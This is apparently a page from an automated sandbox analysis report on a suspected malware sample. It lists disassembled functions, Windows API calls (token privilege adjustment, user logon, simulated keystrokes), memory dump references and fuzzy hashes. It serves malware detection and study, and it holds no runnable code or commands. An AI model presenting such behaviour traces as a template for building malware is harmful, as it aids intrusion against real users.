                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: aea155f1e03846a7945f3ef32b85c3da0dbec0b08e6aeb419bf15716d252f37c
                                                                                                      • Instruction ID: 5becaa0be1146218bead7415047f77378e1327371ad28ca074d37e765ff57597
                                                                                                      • Opcode Fuzzy Hash: aea155f1e03846a7945f3ef32b85c3da0dbec0b08e6aeb419bf15716d252f37c
                                                                                                      • Instruction Fuzzy Hash: 44F02833900A209BC6313F6A9C05B6A7398DF82371F180B15F865931D2DFB0D8028BB1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _wcslen
                                                                                                      • String ID:
                                                                                                      • API String ID: 176396367-0
                                                                                                      • Opcode ID: 41857fa16978e823efbc9f025671a5b1dff55116fb35f6b10a015bb473353f75
                                                                                                      • Instruction ID: 15753cc2d6b2911c881c4ba7d70f1b9150e94147b86560aef39e248f395f1041
                                                                                                      • Opcode Fuzzy Hash: 41857fa16978e823efbc9f025671a5b1dff55116fb35f6b10a015bb473353f75
                                                                                                      • Instruction Fuzzy Hash: E6F0F4B2200704BEC7109F28D802AABBB98EF44360F10822AFA19CB1D0DB31E45087B4
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1931555351.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1931530312.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931580966.000000001001B000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931602166.0000000010022000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931621641.0000000010026000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_10000000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __lock_file
                                                                                                      • String ID:
                                                                                                      • API String ID: 3031932315-0
                                                                                                      • Opcode ID: 12a0f282b58cce0ff486d66000e23ea24b4ec83bbd73162d59ad24f63ce1458c
                                                                                                      • Instruction ID: 99e85b588fe84bcb07606bf4c19cd2c152d96ee67ad381c87e8b1177ac2ba898
                                                                                                      • Opcode Fuzzy Hash: 12a0f282b58cce0ff486d66000e23ea24b4ec83bbd73162d59ad24f63ce1458c
                                                                                                      • Instruction Fuzzy Hash: 55018475C00A09EBEF11DF649C0158F3FA2FF893E1F204215F8641A169D7359A51DF91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • RtlAllocateHeap.NTDLL(00000000,?,?,?,00D36A99,?,0000015D,?,?,?,?,00D385D0,000000FF,00000000,?,?), ref: 00D43BE2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocateHeap
                                                                                                      • String ID:
                                                                                                      • API String ID: 1279760036-0
                                                                                                      • Opcode ID: a1309c3902b819a5e3b92d07ca9b8aa8a22ff492dde8bcc1503a0205570470d8
                                                                                                      • Instruction ID: 67f5d3127b04bc80fd5908418a708029da7be92571d948ef6b330cf1a6bf1ca8
                                                                                                      • Opcode Fuzzy Hash: a1309c3902b819a5e3b92d07ca9b8aa8a22ff492dde8bcc1503a0205570470d8
                                                                                                      • Instruction Fuzzy Hash: 93E06D3160466457E6212A6EEC02F5A7659EB427A0F1D0121AC46D61A0DB71DE008AF2
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: d20d832ed81b1ade3e6d13ddeec6a3fdd053eb4932d48628bd45a8b434c3550a
                                                                                                      • Instruction ID: d21301f2c6eaeb3a0c1b134280b42324cbca530223e53394e8172b8ddf1a9599
                                                                                                      • Opcode Fuzzy Hash: d20d832ed81b1ade3e6d13ddeec6a3fdd053eb4932d48628bd45a8b434c3550a
                                                                                                      • Instruction Fuzzy Hash: 28F03071105712DFCB359F64E494892BBE5FF14316318897EE5D782620CB31E884DF60
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __fread_nolock
                                                                                                      • String ID:
                                                                                                      • API String ID: 2638373210-0
                                                                                                      • Opcode ID: 246872d857331b2299f9d721c1e21c3e63b90e22c0d4325a9684d784a7ce1dac
                                                                                                      • Instruction ID: 58452a036872e7bb354839ed26e4d08d8e03456114a3f446fd04361fd0ae28a2
                                                                                                      • Opcode Fuzzy Hash: 246872d857331b2299f9d721c1e21c3e63b90e22c0d4325a9684d784a7ce1dac
                                                                                                      • Instruction Fuzzy Hash: 9EF0F87140020DFFDF05DF90C941E9E7B79FB04318F208445F9159A151D336DA61EBA1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00D138EA
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: IconNotifyShell_
                                                                                                      • String ID:
                                                                                                      • API String ID: 1144537725-0
                                                                                                      • Opcode ID: 57f7547c631fdeb39f3755b1f8864c2eef5210a4832e2f7601faffca201a8c89
                                                                                                      • Instruction ID: 6f16a67efa23f40d2ab90fbfbe9d69b5d9a24576e873c3065478c65a59556f1d
                                                                                                      • Opcode Fuzzy Hash: 57f7547c631fdeb39f3755b1f8864c2eef5210a4832e2f7601faffca201a8c89
                                                                                                      • Instruction Fuzzy Hash: 5BF037709143589FE752DF64DC467E67BBCAB05708F0400A9A584DA282D7745B88CF61
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00D139FD
                                                                                                        • Part of subcall function 00D184B7: _wcslen.LIBCMT ref: 00D184CA
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LongNamePath_wcslen
                                                                                                      • String ID:
                                                                                                      • API String ID: 541455249-0
                                                                                                      • Opcode ID: 76ece0843b25af8e7c78c49df2ee8092d14e5171c7426daa491bf6653a541628
                                                                                                      • Instruction ID: b1c3dcc2575bfd6d74507b52315186ecd145495f00dc8071c4d86e39cff4616f
                                                                                                      • Opcode Fuzzy Hash: 76ece0843b25af8e7c78c49df2ee8092d14e5171c7426daa491bf6653a541628
                                                                                                      • Instruction Fuzzy Hash: 2CE0C276A002246BCB20E2989C06FEA77EEDFC9790F0400B1FC09D7248DDA4ED84D6B4
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • CreateFileW.KERNELBASE(00000000,00000000,?,00D50AA4,?,?,00000000,?,00D50AA4,00000000,0000000C), ref: 00D50757
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 823142352-0
                                                                                                      • Opcode ID: 07ef07340fcd1edb0e11f1cc3b7b48554b83951400637b1d03be6f9f72e973c9
                                                                                                      • Instruction ID: 7c7691e968aa541250e43943ede0e62495aa626d6b2ba60339e37902510a7864
                                                                                                      • Opcode Fuzzy Hash: 07ef07340fcd1edb0e11f1cc3b7b48554b83951400637b1d03be6f9f72e973c9
                                                                                                      • Instruction Fuzzy Hash: 50D06C3210020DBBDF028F84DD06EDA3BAAFB48714F014000BE5896120C736E821AB90
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1931555351.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1931530312.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931580966.000000001001B000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931602166.0000000010022000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931621641.0000000010026000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_10000000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __fsopen
                                                                                                      • String ID:
                                                                                                      • API String ID: 3646066109-0
                                                                                                      • Opcode ID: 81a7ef177c2aad27b31c1c230c47c9835e2fc74504955d76d42e8ba4421539f4
                                                                                                      • Instruction ID: ff12db4a453950af2b148ac20ce593bb9f66c7d12e27d942a37d135ac9bdb1eb
                                                                                                      • Opcode Fuzzy Hash: 81a7ef177c2aad27b31c1c230c47c9835e2fc74504955d76d42e8ba4421539f4
                                                                                                      • Instruction Fuzzy Hash: BBC04C7944024CBBDF069F89EC41C4A3B69EB59254F008010FE1C09235E637E770DB91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1931555351.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1931530312.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931580966.000000001001B000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931602166.0000000010022000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931621641.0000000010026000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_10000000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __fsopen
                                                                                                      • String ID:
                                                                                                      • API String ID: 3646066109-0
                                                                                                      • Opcode ID: f8c42548a2cda66d096bb6972a51471e878f6fbfb6c2f04a1a915422f54fec35
                                                                                                      • Instruction ID: 8ab5b706a5493ba48f41df1179b6d5d00b5d2ba0bf6bc409f2360f3393fe76d2
                                                                                                      • Opcode Fuzzy Hash: f8c42548a2cda66d096bb6972a51471e878f6fbfb6c2f04a1a915422f54fec35
                                                                                                      • Instruction Fuzzy Hash: E7B0927A48020C77DE011E82EC02A4A3B1D9B506A0F008020FB0C18165E677E7609689
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 00D12441: GetWindowLongW.USER32(00000000,000000EB), ref: 00D12452
                                                                                                      • DefDlgProcW.USER32(?,0000004E,?,?,?,?), ref: 00DA9F79
                                                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00DA9FBA
                                                                                                      • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00DA9FFE
                                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00DAA028
                                                                                                      • SendMessageW.USER32 ref: 00DAA051
                                                                                                      • GetKeyState.USER32(00000011), ref: 00DAA0EA
                                                                                                      • GetKeyState.USER32(00000009), ref: 00DAA0F7
                                                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00DAA10D
                                                                                                      • GetKeyState.USER32(00000010), ref: 00DAA117
                                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00DAA148
                                                                                                      • SendMessageW.USER32 ref: 00DAA16F
                                                                                                      • SendMessageW.USER32(?,00001030,?,Function_000987F4), ref: 00DAA277
                                                                                                      • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?), ref: 00DAA28D
                                                                                                      • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00DAA2A0
                                                                                                      • SetCapture.USER32(?), ref: 00DAA2A9
                                                                                                      • ClientToScreen.USER32(?,?), ref: 00DAA30E
                                                                                                      • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00DAA31B
                                                                                                      • InvalidateRect.USER32(?,00000000,00000001,?), ref: 00DAA335
                                                                                                      • ReleaseCapture.USER32 ref: 00DAA340
                                                                                                      • GetCursorPos.USER32(?), ref: 00DAA378
                                                                                                      • ScreenToClient.USER32(?,?), ref: 00DAA385
                                                                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00DAA3DF
                                                                                                      • SendMessageW.USER32 ref: 00DAA40D
                                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00DAA44A
                                                                                                      • SendMessageW.USER32 ref: 00DAA479
                                                                                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00DAA49A
                                                                                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00DAA4A9
                                                                                                      • GetCursorPos.USER32(?), ref: 00DAA4C7
                                                                                                      • ScreenToClient.USER32(?,?), ref: 00DAA4D4
                                                                                                      • GetParent.USER32(?), ref: 00DAA4F2
                                                                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00DAA559
                                                                                                      • SendMessageW.USER32 ref: 00DAA58A
                                                                                                      • ClientToScreen.USER32(?,?), ref: 00DAA5E3
                                                                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00DAA613
                                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00DAA63D
                                                                                                      • SendMessageW.USER32 ref: 00DAA660
                                                                                                      • ClientToScreen.USER32(?,?), ref: 00DAA6AD
                                                                                                      • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00DAA6E1
                                                                                                        • Part of subcall function 00D121E4: GetWindowLongW.USER32(?,000000EB), ref: 00D121F2
                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00DAA764
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                                                                      • String ID: @GUI_DRAGID$F
                                                                                                      • API String ID: 3429851547-4164748364
                                                                                                      • Opcode ID: 661ccc455fe890411532c517253d66abe615533c01ef02372a8e23c28546ee1b
                                                                                                      • Instruction ID: ecab0b9fc9e703c781af55ec1b2407fa19972f89a165e5c93f24ccc6f120a28a
                                                                                                      • Opcode Fuzzy Hash: 661ccc455fe890411532c517253d66abe615533c01ef02372a8e23c28546ee1b
                                                                                                      • Instruction Fuzzy Hash: 64427A34604340AFD725CF28CC94AAABBE5FF4A314F184619F696C72A1DB71E850CF62
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 00D2FC94
                                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00D6FC58
                                                                                                      • IsIconic.USER32(00000000), ref: 00D6FC61
                                                                                                      • ShowWindow.USER32(00000000,00000009), ref: 00D6FC6E
                                                                                                      • SetForegroundWindow.USER32(00000000), ref: 00D6FC78
                                                                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00D6FC8E
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00D6FC95
                                                                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00D6FCA1
                                                                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 00D6FCB2
                                                                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 00D6FCBA
                                                                                                      • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 00D6FCC2
                                                                                                      • SetForegroundWindow.USER32(00000000), ref: 00D6FCC5
                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00D6FCDA
                                                                                                      • keybd_event.USER32(00000012,00000000), ref: 00D6FCE5
                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00D6FCEF
                                                                                                      • keybd_event.USER32(00000012,00000000), ref: 00D6FCF4
                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00D6FCFD
                                                                                                      • keybd_event.USER32(00000012,00000000), ref: 00D6FD02
                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00D6FD0C
                                                                                                      • keybd_event.USER32(00000012,00000000), ref: 00D6FD11
                                                                                                      • SetForegroundWindow.USER32(00000000), ref: 00D6FD14
                                                                                                      • AttachThreadInput.USER32(?,000000FF,00000000), ref: 00D6FD3B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                      • String ID: Shell_TrayWnd
                                                                                                      • API String ID: 4125248594-2988720461
                                                                                                      • Opcode ID: d7f67ea3eba1f7047883c38e8eadf846b58cd765c2d206d0ccaab1447b1d7a81
                                                                                                      • Instruction ID: 1c71d8be2782f35d8aa8d9e8a08916ad491b39c385572cc0f00bfb0cc709422d
                                                                                                      • Opcode Fuzzy Hash: d7f67ea3eba1f7047883c38e8eadf846b58cd765c2d206d0ccaab1447b1d7a81
                                                                                                      • Instruction Fuzzy Hash: E0315271A4031CBFEB206BA55C4AFBF7E6DEB45B54F150065FA02E62D1D6B09D00AAB0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 00D71F53: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00D71F9D
                                                                                                        • Part of subcall function 00D71F53: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00D71FCA
                                                                                                        • Part of subcall function 00D71F53: GetLastError.KERNEL32 ref: 00D71FDA
                                                                                                      • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00D71B16
                                                                                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00D71B38
                                                                                                      • CloseHandle.KERNEL32(?), ref: 00D71B49
                                                                                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00D71B61
                                                                                                      • GetProcessWindowStation.USER32 ref: 00D71B7A
                                                                                                      • SetProcessWindowStation.USER32(00000000), ref: 00D71B84
                                                                                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00D71BA0
                                                                                                        • Part of subcall function 00D7194F: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00D71A8C), ref: 00D71964
                                                                                                        • Part of subcall function 00D7194F: CloseHandle.KERNEL32(?,?,00D71A8C), ref: 00D71979
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                                      • String ID: $default$winsta0
                                                                                                      • API String ID: 22674027-1027155976
                                                                                                      • Opcode ID: 6f05d15a7931f08c645b802d0cc2339ab4528f73a43c262d84a7ffa86baabc77
                                                                                                      • Instruction ID: ab5f776fc56ab331cc312982fd8ad5d5c1834abec7cdd96c1b04aa31a333adf4
                                                                                                      • Opcode Fuzzy Hash: 6f05d15a7931f08c645b802d0cc2339ab4528f73a43c262d84a7ffa86baabc77
                                                                                                      • Instruction Fuzzy Hash: 57816C75940309AFDF119FA9DC49BEEBBB9EF05300F188219F919E62A0E7718945CB70
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 00D71989: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00D719A4
                                                                                                        • Part of subcall function 00D71989: GetLastError.KERNEL32(?,00000000,00000000,?,?,00D7142B,?,?,?), ref: 00D719B0
